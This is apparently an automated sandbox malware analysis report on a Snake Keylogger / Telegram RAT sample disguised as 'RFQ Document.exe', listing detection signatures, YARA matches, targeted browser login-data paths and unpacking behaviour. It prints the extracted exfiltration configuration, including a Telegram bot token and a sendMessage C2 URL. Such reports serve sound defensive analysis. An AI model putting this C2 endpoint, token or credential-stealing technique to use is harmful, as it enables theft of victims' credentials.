Play interactive tour

Edit tour

Windows Analysis Report RFQ Document.exe

Overview

General Information

Sample Name:	RFQ Document.exe
Analysis ID:	491944
MD5:	64468b2ab541687572ce6b435b41f2bd
SHA1:	893ae234d351c762ab388a7337c625e4b213da6e
SHA256:	d3ac98cf64ca2fca455b2e4f002c3381bcee699cf64bbfaa076222209f834b1a
Tags:	exeSnakeKeylogger
Infos:
Most interesting Screenshot:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Snake Keylogger

Malicious sample detected (through community Yara rule)

Detected unpacking (overwrites its own PE header)

Yara detected Telegram RAT

Detected unpacking (changes PE section rights)

Detected unpacking (creates a PE file in dynamic memory)

Initial sample is a PE file and has a suspicious name

Tries to harvest and steal ftp login credentials

.NET source code references suspicious native API functions

Uses the Telegram API (likely for C&C communication)

Machine Learning detection for sample

May check the online IP address of the machine

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Executable has a suspicious name (potential lure to open the executable)

Tries to steal Mail credentials (via file access)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Uses insecure TLS / SSL version for HTTPS connection

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

RFQ Document.exe (PID: 2628 cmdline: 'C:\Users\user\Desktop\RFQ Document.exe' MD5: 64468B2AB541687572CE6B435B41F2BD)

RFQ Document.exe (PID: 6484 cmdline: 'C:\Users\user\Desktop\RFQ Document.exe' MD5: 64468B2AB541687572CE6B435B41F2BD)

cleanup

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram Token": "1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E", "Telegram ID": "1664748411"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendMessage"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.926695160.00000000024D6000.00000004.00000001.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.926695160.00000000024D6000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2c6d8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2b8c1:$a3: \Google\Chrome\User Data\Default\Login Data 0x2bd08:$a4: \Orbitum\User Data\Default\Login Data 0x2ce89:$a5: \Kometa\User Data\Default\Login Data
00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b280:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a469:$a3: \Google\Chrome\User Data\Default\Login Data 0x1a8b0:$a4: \Orbitum\User Data\Default\Login Data 0x1ba31:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x302d8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2f4c1:$a3: \Google\Chrome\User Data\Default\Login Data 0x2f908:$a4: \Orbitum\User Data\Default\Login Data 0x30a89:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.928008306.0000000004942000.00000040.00000001.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.928008306.0000000004942000.00000040.00000001.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.928008306.0000000004942000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.927923134.0000000003461000.00000004.00000001.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.927923134.0000000003461000.00000004.00000001.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.927923134.0000000003461000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RFQ Document.exe PID: 2628	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RFQ Document.exe PID: 2628	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RFQ Document.exe PID: 6484	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.RFQ Document.exe.7b49c8.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19480:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x18669:$a3: \Google\Chrome\User Data\Default\Login Data 0x18ab0:$a4: \Orbitum\User Data\Default\Login Data 0x19c31:$a5: \Kometa\User Data\Default\Login Data
2.2.RFQ Document.exe.7b49c8.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RFQ Document.exe.7b49c8.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RFQ Document.exe.7b49c8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RFQ Document.exe.22f0000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b280:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a469:$a3: \Google\Chrome\User Data\Default\Login Data 0x1a8b0:$a4: \Orbitum\User Data\Default\Login Data 0x1ba31:$a5: \Kometa\User Data\Default\Login Data
2.2.RFQ Document.exe.22f0000.3.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RFQ Document.exe.22f0000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RFQ Document.exe.22f0000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RFQ Document.exe.3465530.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b280:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a469:$a3: \Google\Chrome\User Data\Default\Login Data 0x1a8b0:$a4: \Orbitum\User Data\Default\Login Data 0x1ba31:$a5: \Kometa\User Data\Default\Login Data
2.2.RFQ Document.exe.3465530.4.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RFQ Document.exe.3465530.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RFQ Document.exe.3465530.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RFQ Document.exe.400000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2c6d8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2b8c1:$a3: \Google\Chrome\User Data\Default\Login Data 0x2bd08:$a4: \Orbitum\User Data\Default\Login Data 0x2ce89:$a5: \Kometa\User Data\Default\Login Data
2.2.RFQ Document.exe.400000.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RFQ Document.exe.400000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RFQ Document.exe.400000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RFQ Document.exe.7b49c8.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b280:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a469:$a3: \Google\Chrome\User Data\Default\Login Data 0x1a8b0:$a4: \Orbitum\User Data\Default\Login Data 0x1ba31:$a5: \Kometa\User Data\Default\Login Data
2.2.RFQ Document.exe.4940000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b280:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a469:$a3: \Google\Chrome\User Data\Default\Login Data 0x1a8b0:$a4: \Orbitum\User Data\Default\Login Data 0x1ba31:$a5: \Kometa\User Data\Default\Login Data
2.2.RFQ Document.exe.4940000.5.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RFQ Document.exe.4940000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RFQ Document.exe.4940000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RFQ Document.exe.7b49c8.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RFQ Document.exe.7b49c8.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RFQ Document.exe.7b49c8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.RFQ Document.exe.e7e1458.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b280:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a469:$a3: \Google\Chrome\User Data\Default\Login Data 0x1a8b0:$a4: \Orbitum\User Data\Default\Login Data 0x1ba31:$a5: \Kometa\User Data\Default\Login Data
1.2.RFQ Document.exe.e7e1458.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
1.2.RFQ Document.exe.e7e1458.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.RFQ Document.exe.e7e1458.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.1.RFQ Document.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2c6d8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2b8c1:$a3: \Google\Chrome\User Data\Default\Login Data 0x2bd08:$a4: \Orbitum\User Data\Default\Login Data 0x2ce89:$a5: \Kometa\User Data\Default\Login Data
2.1.RFQ Document.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.1.RFQ Document.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.1.RFQ Document.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RFQ Document.exe.3465530.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19480:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x18669:$a3: \Google\Chrome\User Data\Default\Login Data 0x18ab0:$a4: \Orbitum\User Data\Default\Login Data 0x19c31:$a5: \Kometa\User Data\Default\Login Data
2.2.RFQ Document.exe.3465530.4.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RFQ Document.exe.3465530.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RFQ Document.exe.3465530.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RFQ Document.exe.400000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x302d8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2f4c1:$a3: \Google\Chrome\User Data\Default\Login Data 0x2f908:$a4: \Orbitum\User Data\Default\Login Data 0x30a89:$a5: \Kometa\User Data\Default\Login Data
2.2.RFQ Document.exe.400000.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RFQ Document.exe.400000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RFQ Document.exe.400000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.RFQ Document.exe.e7e1458.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19480:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x18669:$a3: \Google\Chrome\User Data\Default\Login Data 0x18ab0:$a4: \Orbitum\User Data\Default\Login Data 0x19c31:$a5: \Kometa\User Data\Default\Login Data
1.2.RFQ Document.exe.e7e1458.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
1.2.RFQ Document.exe.e7e1458.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.RFQ Document.exe.e7e1458.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RFQ Document.exe.22f0000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19480:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x18669:$a3: \Google\Chrome\User Data\Default\Login Data 0x18ab0:$a4: \Orbitum\User Data\Default\Login Data 0x19c31:$a5: \Kometa\User Data\Default\Login Data
2.2.RFQ Document.exe.22f0000.3.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RFQ Document.exe.22f0000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RFQ Document.exe.22f0000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.RFQ Document.exe.e7d0000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x28ad8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x27cc1:$a3: \Google\Chrome\User Data\Default\Login Data 0x28108:$a4: \Orbitum\User Data\Default\Login Data 0x29289:$a5: \Kometa\User Data\Default\Login Data
1.2.RFQ Document.exe.e7d0000.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
1.2.RFQ Document.exe.e7d0000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.RFQ Document.exe.e7d0000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.RFQ Document.exe.e7d0000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2c6d8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2b8c1:$a3: \Google\Chrome\User Data\Default\Login Data 0x2bd08:$a4: \Orbitum\User Data\Default\Login Data 0x2ce89:$a5: \Kometa\User Data\Default\Login Data
1.2.RFQ Document.exe.e7d0000.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
1.2.RFQ Document.exe.e7d0000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.RFQ Document.exe.e7d0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RFQ Document.exe.415058.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b280:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a469:$a3: \Google\Chrome\User Data\Default\Login Data 0x1a8b0:$a4: \Orbitum\User Data\Default\Login Data 0x1ba31:$a5: \Kometa\User Data\Default\Login Data
2.2.RFQ Document.exe.415058.0.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RFQ Document.exe.415058.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RFQ Document.exe.415058.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.1.RFQ Document.exe.415058.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b280:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a469:$a3: \Google\Chrome\User Data\Default\Login Data 0x1a8b0:$a4: \Orbitum\User Data\Default\Login Data 0x1ba31:$a5: \Kometa\User Data\Default\Login Data
2.1.RFQ Document.exe.415058.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.1.RFQ Document.exe.415058.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.1.RFQ Document.exe.415058.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RFQ Document.exe.415058.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19480:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x18669:$a3: \Google\Chrome\User Data\Default\Login Data 0x18ab0:$a4: \Orbitum\User Data\Default\Login Data 0x19c31:$a5: \Kometa\User Data\Default\Login Data
2.2.RFQ Document.exe.415058.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RFQ Document.exe.415058.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RFQ Document.exe.415058.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.1.RFQ Document.exe.415058.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19480:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x18669:$a3: \Google\Chrome\User Data\Default\Login Data 0x18ab0:$a4: \Orbitum\User Data\Default\Login Data 0x19c31:$a5: \Kometa\User Data\Default\Login Data
2.1.RFQ Document.exe.415058.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.1.RFQ Document.exe.415058.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.1.RFQ Document.exe.415058.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 67 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 2.2.RFQ Document.exe.3465530.4.raw.unpack	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram Token": "1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E", "Telegram ID": "1664748411"}
Source: RFQ Document.exe.6484.2.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendMessage"}

Machine Learning detection for sample

Show sources

Source: RFQ Document.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\nsf2EF6.tmp\tkwj.dll

Joe Sandbox ML: detected

Source: 2.1.RFQ Document.exe.400000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 2.2.RFQ Document.exe.400000.1.unpack	Avira: Label: TR/ATRAPS.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\RFQ Document.exe

Unpacked PE file: 2.2.RFQ Document.exe.400000.1.unpack

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\RFQ Document.exe

Unpacked PE file: 2.2.RFQ Document.exe.4940000.5.unpack

Source: RFQ Document.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.4:49774 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49775 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: RFQ Document.exe, 00000001.00000003.668676239.000000000E820000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: RFQ Document.exe, 00000001.00000003.668676239.000000000E820000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 1_2_00405EC2 FindFirstFileA,FindClose,	1_2_00405EC2
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 1_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_004054EC
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 1_2_00402671 FindFirstFileA,	1_2_00402671
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_00404A29 FindFirstFileExW,	2_2_00404A29

Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0234E43Fh	2_2_0234E182
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0234D5E8h	2_2_0234D1D0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0234E89Fh	2_2_0234E5E2
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0234ECFFh	2_2_0234EA40
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0234F15Fh	2_2_0234EEA1
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0234DFDFh	2_2_0234DD06
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0234D021h	2_2_0234CD60
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0234D5E8h	2_2_0234D1C0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_0234B6F8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0234CBC0h	2_2_0234C6C8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0234D5E8h	2_2_0234D516
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_0234BF0C
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_0234BD2B
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0594AC41h	2_2_0594A998
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0594E061h	2_2_0594DDB8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0594B099h	2_2_0594ADF0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0594D7B1h	2_2_0594D508
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0594A7E9h	2_2_0594A540
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0594DC09h	2_2_0594D960
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 05949F39h	2_2_05949C90
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0594D359h	2_2_0594D0B0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0594A391h	2_2_0594A0E8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0594CAA9h	2_2_0594C800
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 05949AE1h	2_2_05949838
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0594CF01h	2_2_0594CC58
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 05949231h	2_2_05948F88
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0594C651h	2_2_0594C3A8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 05949689h	2_2_059493E0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 05948DD9h	2_2_05948B30
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0594C1F9h	2_2_0594BF50
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0594B949h	2_2_0594B6A0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 05948981h	2_2_059486D8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0594BDA1h	2_2_0594BAF8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 0594B4F1h	2_2_0594B248
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 05974832h	2_2_05974588
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 05973F59h	2_2_05973CB0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 059736A9h	2_2_05973400
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 05976241h	2_2_05975F98
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 05973251h	2_2_05972FA8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 05972979h	2_2_059726D0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 05975991h	2_2_059756E8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 059750E1h	2_2_05974E38
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 05974C89h	2_2_059749E0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 059743B1h	2_2_05974108
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 05973B01h	2_2_05973858
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 05976699h	2_2_059763F0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 05972DF9h	2_2_05972B50
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 05975DE9h	2_2_05975B40
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then jmp 05975539h	2_2_05975290
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_059708F0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_059708E0

Networking:

Uses the Telegram API (likely for C&C communication)

Show sources

Source: unknown

DNS query: name: api.telegram.org

May check the online IP address of the machine

Show sources

Source: C:\Users\user\Desktop\RFQ Document.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\Desktop\RFQ Document.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\Desktop\RFQ Document.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\Desktop\RFQ Document.exe	DNS query: name: checkip.dyndns.org

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
